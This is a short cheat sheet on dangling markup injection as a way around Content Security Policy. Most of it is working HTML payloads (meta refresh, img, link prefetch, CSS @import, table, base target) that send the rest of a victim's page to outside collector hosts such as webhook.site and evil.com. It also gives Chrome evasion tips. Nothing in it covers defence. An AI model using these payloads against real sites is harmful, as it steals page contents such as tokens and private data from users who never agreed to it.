
Dangling Markup - CSP Bypass


Dangling Markup

Dangling markup injection exfiltrates part of an HTML page (the markup that follows the injection point) to bypass CSP: the payload needs no script, so a policy that only blocks script execution does not stop it.

To exploit this, you can use a webhook to intercept the request, with the captured page content arriving in the URL path or in a GET parameter.

The request is sent with the HTML content forged into the URL as:

```
https://webhook.site/URL/?<HTML_CONTENT>
```

Payloads

```html
<meta http-equiv="refresh" content='0;URL=https://webhook.site/URL/?
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?content=
```

```html
<head profile="//webhook.site/URL/
```

```html
<body background='open-trace.com/create-request/URL/?
```

```html
<portal src='//webhook.site/URL/?
```

```html
<link rel="prefetch" href='//open-trace.com/create-request/URL/?
```

```html
<img src='//webhook.site/URL/
```

Chrome

Note that Chrome blocks HTTP URLs containing `<` or `\n`, so you could try other protocol schemes such as FTP.

You can also abuse CSS `@import` (it sends all the markup until it finds a `;`):

```html
<style>@import//webhook.site?     <--- Injected
<b>steal me!</b>;
```

You could also use `<table`:

```html
<table background='//webhook.site/URL/?
```

You can also insert a `<base` tag. However, user interaction is required (they must click).

```html
<base href='http://webhook.site/URL/'>

<base target='        <--- Injected
steal me'<b>test</b>
```

User interaction

Click:

```html
<a href='https://webhook.site/URL/?'>Click me to edit form !</a><base target='
```